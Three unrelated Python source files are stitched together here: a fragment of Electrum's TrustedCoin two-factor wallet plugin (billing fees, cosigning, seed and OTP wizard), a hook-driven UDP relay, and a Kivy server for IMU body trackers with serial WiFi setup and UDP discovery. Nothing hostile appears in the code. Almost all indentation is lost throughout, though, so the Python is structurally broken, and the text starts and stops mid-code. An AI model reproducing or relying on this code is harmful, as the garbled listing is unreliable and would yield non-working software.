if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
self.plugin.prompt_user_for_otp(self, tx)
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.auth_code = None
# Utility functions
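# get_user_id() derives a deterministic (long_id, short_id) pair from the two local
# xpubs: long_id is sha256 of the sorted, concatenated xpubs, and short_id is the hex
# sha256 of long_id. make_xpub() uses that long id to derive a child of a hardcoded
# xpub, and make_billing_address() turns the billing xpub into per-user billing addresses.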
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
            t.daemon = True
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum.mnemonic import Mnemonic
from electrum.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = regenerate_key(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
|
udp.py
|
import logging
import socket
import sys
import threading
import hooker
from relay import status
hooker.EVENTS.append([
"udp.start",
"udp.pre_recv",
"udp.post_recv",
"udp.pre_c2s",
"udp.post_c2s",
"udp.pre_s2c",
"udp.post_s2c",
"udp.stop"
])
_KILL = False
_RELAYPORT = 0
_REMOTEADDRESS = ""
_REMOTEPORT = 0
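# relay() runs a single-socket UDP relay: the first peer to send a datagram is
# remembered as the client; its datagrams are forwarded to
# (_REMOTEADDRESS, _REMOTEPORT), and datagrams from anywhere else are sent back to
# that client. hooker.EVENTS hooks fire around each receive/forward step, and the
# relay.status byte counters are updated per direction.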
def relay(recvbuff):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", _RELAYPORT))
incomingsetup = False
clientport = 0
clientip = ""
hooker.EVENTS["udp.start"]()
while True:
hooker.EVENTS["udp.pre_recv"](sock)
data, fromaddr = sock.recvfrom(recvbuff)
data = bytearray(data)
hooker.EVENTS["udp.pre_recv"](sock, data, fromaddr)
if _KILL:
hooker.EVENTS["udp.stop"](sock)
sock.close()
return
if not incomingsetup:
clientport = fromaddr[1]
clientip = fromaddr[0]
incomingsetup = True
if fromaddr[0] == clientip and fromaddr[1] == clientport:
# Forward from client to server
hooker.EVENTS["udp.pre_c2s"](data)
sock.sendto(data, (_REMOTEADDRESS, _REMOTEPORT))
hooker.EVENTS["udp.post_c2s"](data)
status.BYTESTOREMOTE += sys.getsizeof(data)
else:
# Forward from server to client
hooker.EVENTS["udp.pre_s2c"](data)
sock.sendto(data, (clientip, clientport))
hooker.EVENTS["udp.post_s2c"](data)
status.BYTESFROMREMOTE += sys.getsizeof(data)
def start(relayport, remoteaddress, remoteport, recvbuff):
global _RELAYPORT
global _REMOTEADDRESS
global _REMOTEPORT
_RELAYPORT = relayport
_REMOTEADDRESS = remoteaddress
_REMOTEPORT = remoteport
relaythread = threading.Thread(target=relay, args=[recvbuff])
relaythread.start()
def stop():
    global _KILL
    _KILL = True
    # Send a datagram to the relay port to unblock recvfrom() so the relay thread can exit
    quitsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    quitsock.sendto(b"killing", ("127.0.0.1", _RELAYPORT))
quitsock.close()
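# Minimal usage sketch (hedged; the port numbers and remote host are placeholders):
#   start(relayport=5353, remoteaddress="198.51.100.10", remoteport=5353, recvbuff=4096)
#   ...
#   stop()   # sets the kill flag and unblocks recvfrom() so the relay thread exits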
|
main.py
|
import os
import sys
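# resource_path() resolves bundled data files: when running from a PyInstaller
# one-file build, sys._MEIPASS points at the temporary extraction directory;
# otherwise files are looked up relative to the current directory.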
def resource_path(file):
try:
directory = os.path.abspath(sys._MEIPASS)
except:
directory = os.path.abspath('.')
return os.path.join(directory, file)
from kivy.config import Config
Config.set('graphics', 'maxfps', '5000')
Config.set('input', 'mouse', 'mouse,disable_multitouch')
Config.set('graphics', 'width', '900')
Config.set('graphics', 'height', '700')
Config.set('graphics', 'minimum_width', '900')
Config.set('graphics', 'minimum_height', '700')
Config.set('kivy', 'window_icon', resource_path('icon.png'))
from kivy.app import App
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.spinner import Spinner
from kivy.uix.switch import Switch
from kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelItem
from kivy.uix.image import Image
from kivy.clock import Clock, mainthread
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from plyer import filechooser
import serial
import serial.tools.list_ports
from configparser import ConfigParser
import threading
import socket
import struct
import binascii
import time
import math
import subprocess
VERSION = "0.7"
ROLE = ['No role',
'Left foot',
'Right foot',
'Left lower leg',
'Right lower leg',
'Left thigh',
'Right thigh',
'Waist',
'Chest',
'Left shoulder',
'Right shoulder',
'Left upper arm',
'Right upper arm']
MODE = ['AR/VR Stabilized Rotation Vector', 'AR/VR Stabilized Game Rotation Vector']
MODE_SHORT = ['RV', 'GRV']
POWER = [8, 20, 28, 34, 44, 52, 60, 66, 72, 78]
ACCURACY = ['Unreliable', 'Low', 'Medium', 'High']
tpose_image = resource_path('T-pose_skeleton_diagram.png')
kinematics_image = resource_path('tracker_kinematic_chain.png')
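# battPercent() maps a LiPo cell voltage to an approximate charge percentage using
# a logistic-style curve centred around 3.7 V, clamped to the 0-100 range.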
def battPercent(v):
v = float(v)
denominator = (1 + (v / 3.7)**80)**0.165
percent = int(123 - 123 / denominator)
if percent >= 100:
percent = 100
elif percent <= 0:
percent = 0
return percent
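# mapRange() linearly rescales a value; the defaults map signed 16-bit readings
# (-32767..32767) to -1.0..1.0, which is used below to decode quaternion components.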
def mapRange(value, inMin=-32767.0, inMax=32767.0, outMin=-1.0, outMax=1.0):
return outMin + (((value - inMin) / (inMax - inMin)) * (outMax - outMin))
class TrackerView:
ac = ObjectProperty()
px = ObjectProperty()
py = ObjectProperty()
pz = ObjectProperty()
qx = ObjectProperty()
qy = ObjectProperty()
qz = ObjectProperty()
qw = ObjectProperty()
class TransformInput:
tx = ObjectProperty()
ty = ObjectProperty()
tz = ObjectProperty()
class SegmentSlider:
slider = ObjectProperty()
class OffsetSlider:
slider1 = ObjectProperty()
slider2 = ObjectProperty()
class OnOffSwitch:
switch = ObjectProperty()
class Pop(FloatLayout):
def __init__(self):
super().__init__()
self.size = (Window.size[1] * 0.8, Window.size[1] * 0.8)
self.pos_hint = {'center_x': .5, 'center_y': .5}
panel = TabbedPanel(do_default_tab=False,
size=(Window.size[1] * 0.8, Window.size[1] * 0.8),
pos_hint={'center_x': .5, 'center_y': .5},
tab_width=Window.size[1] * 0.8 / 2.1)
panelOne = TabbedPanelItem(text='T-pose skeleton joint diagram')
image_path = tpose_image
img = Image(source=image_path, pos_hint = {'center_x': .5, 'center_y': .5})
panelOne.add_widget(img)
panelTwo = TabbedPanelItem(text='Tracker kinematic chain')
image_path = kinematics_image
img = Image(source=image_path, pos_hint = {'center_x': .5, 'center_y': .5})
panelTwo.add_widget(img)
panel.add_widget(panelOne)
panel.add_widget(panelTwo)
self.add_widget(panel)
class RoleList(BoxLayout):
def __init__(self, mac, connect, mode, power, sleep, role):
super().__init__()
self.height = App.get_running_app().root.ids.layout_ref.height / 1.75
self.size_hint_y = None
self.padding = [0, 0, 0, 2]
extend = '_extend' in mac
L1 = Label(size_hint_x=0.2, text=str(mac))
C1 = Switch(size_hint_x=0.1, active=connect, disabled=extend)
S1 = Spinner(size_hint_x=0.35, text=str(mode), values=MODE)
S2 = Spinner(size_hint_x=0.1, text=str(power), values=['{:.1f}'.format(x/4.0) for x in POWER], disabled=extend)
C2 = Switch(size_hint_x=0.1, active=sleep, disabled=extend)
S3 = Spinner(size_hint_x=0.15, text=str(role), values=ROLE)
App.get_running_app().root.ids[mac + '_role_mac'] = L1
App.get_running_app().root.ids[mac + '_role_connect'] = C1
App.get_running_app().root.ids[mac + '_role_mode'] = S1
App.get_running_app().root.ids[mac + '_role_power'] = S2
App.get_running_app().root.ids[mac + '_role_sleep'] = C2
App.get_running_app().root.ids[mac + '_role_role'] = S3
C1.bind(active=self.onActive1)
S1.bind(text=self.onText1)
S2.bind(text=self.onText2)
C2.bind(active=self.onActive2)
S3.bind(text=self.onText3)
self.add_widget(L1)
self.add_widget(C1)
self.add_widget(S1)
self.add_widget(S2)
self.add_widget(C2)
self.add_widget(S3)
def onActive1(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_connect', '')
ImuFbtServer.devices_list[mac]['connect'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_connect') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_connect')].active = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['connect'] = value
def onText1(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if v == instance:
mac = k.replace('_role_mode', '')
ImuFbtServer.devices_list[mac]['mode'] = value
def onText2(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_power', '')
ImuFbtServer.devices_list[mac]['power'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_power') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_power')].text = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['power'] = value
def onActive2(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if '_main' in k and v == instance:
mac = k.replace('_role_sleep', '')
ImuFbtServer.devices_list[mac]['sleep'] = value
if mac.replace('_main', '_extend') in ImuFbtServer.devices_list.keys() and \
mac.replace('_main', '_extend_role_sleep') in App.get_running_app().root.ids.keys():
App.get_running_app().root.ids[mac.replace('_main', '_extend_role_sleep')].active = value
ImuFbtServer.devices_list[mac.replace('_main', '_extend')]['sleep'] = value
def onText3(self, instance, value):
for k, v in App.get_running_app().root.ids.items():
if v == instance:
mac = k.replace('_role_role', '')
ImuFbtServer.devices_list[mac]['role'] = value
class DeviceList(BoxLayout):
def __init__(self, mac, ip, battery, mode, accuracy, power, sleep, role):
super().__init__()
self.height = App.get_running_app().root.ids.layout_ref.height / 1.75
self.size_hint_y = None
self.padding = [0, 0, 0, 2]
L1 = Label(size_hint_x=0.2, text=str(mac))
L2 = Label(size_hint_x=0.175, text=str(ip))
L3 = Label(size_hint_x=0.075, text=str(battery))
L4 = Label(size_hint_x=0.075, text=str(battPercent(battery)))
L5 = Label(size_hint_x=0.075, text=str(mode))
L6 = Label(size_hint_x=0.075, text=str(accuracy))
L7 = Label(size_hint_x=0.0875, text=str(power))
L8 = Label(size_hint_x=0.0875, text=str(sleep))
L9 = Label(size_hint_x=0.15, text=str(role))
App.get_running_app().root.ids[mac + '_list_mac'] = L1
App.get_running_app().root.ids[mac + '_list_ip'] = L2
App.get_running_app().root.ids[mac + '_list_battery'] = L3
App.get_running_app().root.ids[mac + '_list_percent'] = L4
App.get_running_app().root.ids[mac + '_list_mode'] = L5
App.get_running_app().root.ids[mac + '_list_accuracy'] = L6
App.get_running_app().root.ids[mac + '_list_power'] = L7
App.get_running_app().root.ids[mac + '_list_sleep'] = L8
App.get_running_app().root.ids[mac + '_list_role'] = L9
self.add_widget(L1)
self.add_widget(L2)
self.add_widget(L3)
self.add_widget(L4)
self.add_widget(L5)
self.add_widget(L6)
self.add_widget(L7)
self.add_widget(L8)
self.add_widget(L9)
class ImuFbtServer(App):
broadPort = 6969
devices_list = {}
devices_online = {}
devices_broad_online = {}
focused = False
temp_focus = ''
current_page = ''
def save_settings(self):
filechooser.save_file(on_selection=self.handle_save, filters=['*.ini'])
def load_settings(self):
filechooser.open_file(on_selection=self.handle_load, filters=['*.ini'])
def handle_save(self, selection):
if len(selection):
file = selection[0]
if file[-4:] != '.ini':
file += '.ini'
self.save(file)
def handle_load(self, selection):
if len(selection):
self.load(selection[0])
def show_popup(self):
show = Pop()
size = (Window.size[1] * 0.8, Window.size[1] * 0.8)
popupWindow = Popup(title="Help", content=show, size_hint=(None, None), size=size)
popupWindow.open()
@mainthread
def textinput_focus(self, *args):
instance = args[0][0]
value = args[0][1]
if value:
self.focused = True
self.temp_focus = instance.text
Clock.schedule_once(lambda dt: instance.select_all())
else:
if instance.text == '':
instance.text = self.temp_focus
self.focused = False
@mainthread
def wifi_configure_disabled(self, val):
self.root.ids.wifi_configure.disabled = val
@mainthread
def wifi_configure_status_text(self, val):
self.root.ids.wifi_configure_status.text = val
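    # wifi_thread() pushes WiFi credentials to a tracker over the selected serial
    # port at 115200 baud as '111\n<ssid>\n<password>\n' and waits up to ~3 s for the
    # acknowledgement byte 110 before reporting success or a timeout.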
def wifi_thread(self):
self.wifi_configure_disabled(True)
try:
port = self.root.ids.com_port_list.text
ssid = self.root.ids.wifi_ssid.text
password = self.root.ids.wifi_password.text
if len(port) == 0 or len(ssid) == 0 or len(password) == 0:
self.wifi_configure_status_text('Invalid settings')
self.wifi_configure_disabled(False)
return
ser = serial.Serial(port, 115200, timeout=0.1, write_timeout=0.1,
xonxoff=False, rtscts=False, dsrdtr=False)
payload = '111\n{}\n{}\n'.format(ssid, password)
ser.write(payload.encode())
start = time.perf_counter()
while self.wifi_thread_run:
msg = ser.read(1)
if len(msg) > 0 and msg[0] == 110:
self.wifi_configure_status_text('WiFi configured')
break
if time.perf_counter() - start >= 3:
self.wifi_configure_status_text('Serial timeout error')
break
time.sleep(0.1)
ser.close()
except:
self.wifi_configure_status_text('Serial connection error')
self.wifi_configure_disabled(False)
self.wifi_thread_run = False
def configure_wifi(self):
self.wifi_thread_run = True
self.wifi_thread_process = threading.Thread(target=self.wifi_thread, args=())
self.wifi_thread_process.start()
def com_port_scanner(self, dt):
com_list = serial.tools.list_ports.comports()
port_list = []
for port in com_list:
port_list.append(port[0])
if self.root.ids.com_port_list.text not in port_list:
self.root.ids.com_port_list.text = ''
self.root.ids.com_port_list.values = port_list
@mainthread
def calibrate_imu_button_disabled(self, val):
self.root.ids.calibrate_imu_button.disabled = val
@mainthread
def calibrate_imu_button_text(self, val):
self.root.ids.calibrate_imu_button.text = val
def calibrate(self):
self.calibrate_imu_button_disabled(True)
i = 3
while self.calibrate_run:
self.calibrate_imu_button_text('Calibrating in {}...'.format(i))
i -= 1
time.sleep(1)
if i <= 0:
payload = struct.pack('<B', 51)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
break
self.calibrate_run = False
self.calibrate_imu_button_text('Calibrate')
self.calibrate_imu_button_disabled(False)
def calibrate_imu(self):
self.calibrate_run = True
self.calibrate_process = threading.Thread(target=self.calibrate, args=())
self.calibrate_process.start()
def measure_height(self):
payload = struct.pack('<B', 31)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
def check_payload(self, payload):
if payload[0] == ord('I') and payload[-1] == ord('i'):
return True
else:
return False
def wrap_payload(self, payload):
header = b'I'
footer = b'i'
return header + payload + footer
def unwrap_payload(self, payload):
return payload[1:-1]
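    # All UDP payloads exchanged with trackers and the SteamVR bridge are framed with
    # a leading b'I' and trailing b'i', e.g. wrap_payload(b'\x01') == b'I\x01i' and
    # unwrap_payload(wrap_payload(p)) == p.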
@mainthread
def add_stack_role(self, mac, connect, mode, power, sleep, role):
RoleList_widget = RoleList(mac, connect, mode, power, sleep, role)
self.root.ids.stack_role.add_widget(RoleList_widget)
self.root.ids[mac + '_role'] = RoleList_widget
@mainthread
def remove_stack_role(self, k):
if k + '_role' in self.root.ids.keys():
self.root.ids.stack_role.remove_widget(self.root.ids[k + '_role'])
if k + '_role' in self.root.ids.keys():
del self.root.ids[k + '_role']
if k + '_role_mac' in self.root.ids.keys():
del self.root.ids[k + '_role_mac']
if k + '_role_connect' in self.root.ids.keys():
del self.root.ids[k + '_role_connect']
if k + '_role_mode' in self.root.ids.keys():
del self.root.ids[k + '_role_mode']
if k + '_role_power' in self.root.ids.keys():
del self.root.ids[k + '_role_power']
if k + '_role_sleep' in self.root.ids.keys():
del self.root.ids[k + '_role_sleep']
if k + '_role_role' in self.root.ids.keys():
del self.root.ids[k + '_role_role']
@mainthread
def steam_status_text(self, val):
self.root.ids.steam_status.text = val
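    # broadudp() listens on UDP port 6969 for two packet types: tracker discovery
    # announcements ('<BBBBBBB?': marker 77, 6-byte MAC, extend flag), answered with a
    # '<BBBBBBBHH' config reply (code 200) carrying roles, modes, TX power, sleep and
    # the server/bridge ports; and a '<BH' hello from the local SteamVR driver
    # (marker 17), answered with (18, serverPort). Devices unseen for 5 s are pruned.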
def broadudp(self):
broad_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
broad_listen.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
broad_listen.bind(('0.0.0.0', self.broadPort))
broad_listen.settimeout(0.5)
hostname = socket.gethostname()
host_list = socket.getaddrinfo(hostname, self.broadPort, socket.AF_INET, socket.SOCK_DGRAM)
hostIPs = ['127.0.0.1']
for i in range(len(host_list)):
hostIPs.append(host_list[i][4][0])
while self.broad_run:
try:
payload, addr = broad_listen.recvfrom(32)
if self.check_payload(payload):
payload = self.unwrap_payload(payload)
if len(payload) == struct.calcsize('<BBBBBBB?'):
if payload[0] == 77:
ip = addr[0]
mac = binascii.hexlify(payload[1:7]).decode()
extend = payload[7]
macs = [mac + '_main', mac + '_extend']
roles_reply = [0, 0]
modes_reply = [0, 0]
if extend:
for_length = 2
else:
for_length = 1
for i in range(for_length):
mac = macs[i]
self.devices_broad_online[mac] = time.perf_counter()
if mac + '_role' not in self.root.ids.keys():
if mac in self.devices_list.keys():
connect = self.devices_list[mac]['connect']
mode = self.devices_list[mac]['mode']
power = self.devices_list[mac]['power']
sleep = self.devices_list[mac]['sleep']
role = self.devices_list[mac]['role']
else:
connect = False
mode = MODE[0]
power = '19.5'
sleep = True
role = ROLE[0]
self.devices_list[mac] = {}
self.devices_list[mac]['connect'] = connect
self.devices_list[mac]['mode'] = mode
self.devices_list[mac]['power'] = power
self.devices_list[mac]['sleep'] = sleep
self.devices_list[mac]['role'] = role
self.add_stack_role(mac, connect, mode, power, sleep, role)
roles_reply[i] = ROLE.index(self.devices_list[mac]['role'])
modes_reply[i] = MODE.index(self.devices_list[mac]['mode'])
if self.devices_list[macs[0]]['connect']:
reply = struct.pack('<BBBBBBBHH', 200, roles_reply[0], roles_reply[1], modes_reply[0], modes_reply[1],
int(float(self.devices_list[mac]['power']) * 4), self.devices_list[mac]['sleep'],
self.serverPort, self.bridgePort)
broad_listen.sendto(self.wrap_payload(reply), (ip, self.broadPort))
elif len(payload) == struct.calcsize('<BH'):
if payload[0] == 17 and addr[0] in hostIPs:
self.steam_status_text('SteamVR online')
ip = addr[0]
_, self.bridgePort = struct.unpack('<BH', payload)
reply = struct.pack('<BH', 18, self.serverPort)
broad_listen.sendto(self.wrap_payload(reply), (ip, self.bridgePort))
except:
pass
to_del = []
for k, v in self.devices_broad_online.items():
if time.perf_counter() - v >= 5:
to_del.append(k)
for k in to_del:
